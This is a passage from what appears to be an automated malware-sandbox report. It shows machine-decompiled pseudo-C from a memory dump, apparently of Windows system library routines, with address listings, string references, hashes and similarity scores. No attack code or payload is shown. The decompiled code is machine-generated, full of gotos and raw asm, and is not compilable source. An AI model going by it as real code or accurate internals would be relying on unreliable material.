								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E00F5A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L00F34620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x00f21b8f
0x00f21b9a
0x00f21b9c
0x00f21b9e
0x00f21ba3
0x00f77010
0x00f77010
0x00000000
0x00f21ba9
0x00f21ba9
0x00f21bae
0x00000000
0x00f21bc5
0x00f21bca
0x00f21bcf
0x00f21bd0
0x00f21bd1
0x00f21bd2
0x00f21bd6
0x00f21bdc
0x00f21be0
0x00f76ffc
0x00f77000
0x00000000
0x00f77006
0x00f77009
0x00f77009
0x00f21be6
0x00f21bec
0x00f21c0b
0x00f21c0b
0x00f21c0c
0x00f21c11
0x00f21c12
0x00f21c15
0x00f21c1b
0x00f21c1f
0x00f21c31
0x00f21c33
0x00f77026
0x00f77026
0x00f21c21
0x00f21c24
0x00f21c24
0x00f21bee
0x00f21bee
0x00f21bf2
0x00f21c3a
0x00f21bf4
0x00f21bf4
0x00f21c05
0x00f21c05
0x00f21c09
0x00f21c3e
0x00000000
0x00000000
0x00000000
0x00f21c09
0x00f21bec
0x00f21be0
0x00f21bae
0x00f21c2e

Strings

WindowsExcludedProcs, xrefs: 00F21BC5

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 0af95d40507764debde661119b3f92cfe48350bb1b3f9b015bc2cd8b1a5ae24e
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 5F21D37B980638ABCB21AA55A840F9FB7A9BB91760F254426FD048B200D634DC00B7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00F3F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F3F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x00f3f71d
0x00f3f722
0x00f3f726
0x00f84770
0x00f3f765
0x00f3f769
0x00f3f769
0x00f3f732
0x00f8477a
0x00000000
0x00f8477a
0x00f3f738
0x00f3f73a
0x00f3f73c
0x00f3f73f
0x00f3f746
0x00f3f778
0x00f3f7a9
0x00f3f7a9
0x00f3f754
0x00f3f75a
0x00f3f75d
0x00f3f75f
0x00f3f761
0x00f3f76f
0x00f3f771
0x00f3f771
0x00f3f76f
0x00f3f763
0x00000000
0x00f3f763
0x00f3f77d
0x00f3f7a3
0x00f3f7a5
0x00000000
0x00f3f7a5
0x00f3f77f
0x00f3f782
0x00f3f784
0x00f3f786
0x00000000
0x00000000
0x00000000
0x00f3f788
0x00f3f748
0x00f3f74d
0x00f3f78d
0x00f3f793
0x00f3f7b7
0x00f3f7bc
0x00000000
0x00f3f7bc
0x00f3f798
0x00000000
0x00000000
0x00f3f79d
0x00f3f7b0
0x00000000
0x00f3f7b0
0x00f3f79f
0x00000000
0x00f3f74f
0x00f3f74f
0x00000000
0x00f3f74f

Strings

Actx , xrefs: 00F3F73F

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 52034130f0eee577f7ef401c4e1908ede08379853ecfea067a2bfc82ad8f9903
Instruction ID: 9b4be9fbaff58bb53df822330593c384c27170307802ae2dc84de967a9361edb
Opcode Fuzzy Hash: 52034130f0eee577f7ef401c4e1908ede08379853ecfea067a2bfc82ad8f9903
Instruction Fuzzy Hash: 6B11C136F087028BEF244E1D8890B767296EB96774F34453AE866CB391EB70DC49B340

Uniqueness

Uniqueness Score: -1.00%

Function 00FC8DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00FC8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0xff0d50);
				E00F6D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E00FA5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L00F6DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L00F6DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E00F6D130(_t34, _t39, _t40);
			}

0x00fc8df1
0x00fc8df1
0x00fc8df1
0x00fc8df1
0x00fc8df1
0x00fc8df1
0x00fc8df3
0x00fc8df8
0x00fc8dfd
0x00fc8e00
0x00fc8e0e
0x00fc8e2a
0x00fc8e36
0x00fc8e38
0x00fc8e3c
0x00fc8e46
0x00fc8e46
0x00fc8e36
0x00fc8e50
0x00fc8e56
0x00fc8e59
0x00fc8e5c
0x00fc8e60
0x00fc8e67
0x00fc8e6d
0x00fc8e73
0x00fc8e74
0x00fc8eb1
0x00fc8ebd

Strings

Critical error detected %lx, xrefs: 00FC8E21

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: df62150d09c44e1436fe9581654e7e5ec5e6f8ccb2abd42c899fd1e0a8ff5a1d
Instruction ID: 2e96797d1375fd6be4e8857e06ea6c2703109438449271233b686dc97212f72b
Opcode Fuzzy Hash: df62150d09c44e1436fe9581654e7e5ec5e6f8ccb2abd42c899fd1e0a8ff5a1d
Instruction Fuzzy Hash: 77116D71E14349DBDF24CFE58A06BECBBB0BB04755F20425DE5296B292C7784A02EF14

Uniqueness

Uniqueness Score: -1.00%

Function 00FAFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00FAFF60

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 7ddb87f125fc805cf1285f42d8434f2753fec2859184711e91c540e1082ff91f
Instruction ID: dc1c8a6720d53ab94e999ce609255557e83dc572bd75d319988e6821ed9c9255
Opcode Fuzzy Hash: 7ddb87f125fc805cf1285f42d8434f2753fec2859184711e91c540e1082ff91f
Instruction Fuzzy Hash: AF1104B1A10148EFDF22DB90CD49F98B7B1FF09714F148154F5046B2A2C77D9944EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FAFE87, Relevance: 1.3, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00FAFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				void* _t27;
				void* _t32;
				void* _t33;
				void* _t34;
				signed int _t35;

				_v8 =  *0x100d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & "iRegLoadRegistryInfo";
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E00F37D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				return E00F5B640(E00F59AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
			}

0x00fafe96
0x00fafe9e
0x00fafea1
0x00fafead
0x00fafeb3
0x00fafeb9
0x00fafec3
0x00fafed5
0x00fafec5
0x00fafece
0x00fafece
0x00fafee0
0x00fafee1
0x00fafee3
0x00fafefb

Strings

iRegLoadRegistryInfo, xrefs: 00FAFEA8

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: iRegLoadRegistryInfo
API String ID: 0-313553867
Opcode ID: 16b63a76eb4745faa3aa5bd6dcb1e8289196e801f6e164194cb7b110f33d6a9d
Instruction ID: 2d50aa4071f4ddab9f1b30430afb88cfb3f083b6db4ce5182701647e74f64781
Opcode Fuzzy Hash: 16b63a76eb4745faa3aa5bd6dcb1e8289196e801f6e164194cb7b110f33d6a9d
Instruction Fuzzy Hash: A4016270A0420CEFCB14DFA8D942A6EB7F4EF04310F1041A9B904DB392D639D905DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FE5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00FE5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0xff1178);
				E00F6D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E00FE4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E00F5D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E00FE5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x10060e8;
								if( *0x10060e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x10060e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E00F59710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E00F56DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E00F5F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E00F5F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E00F5F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E00F5FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E00F5FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E00F5F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E00F5F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
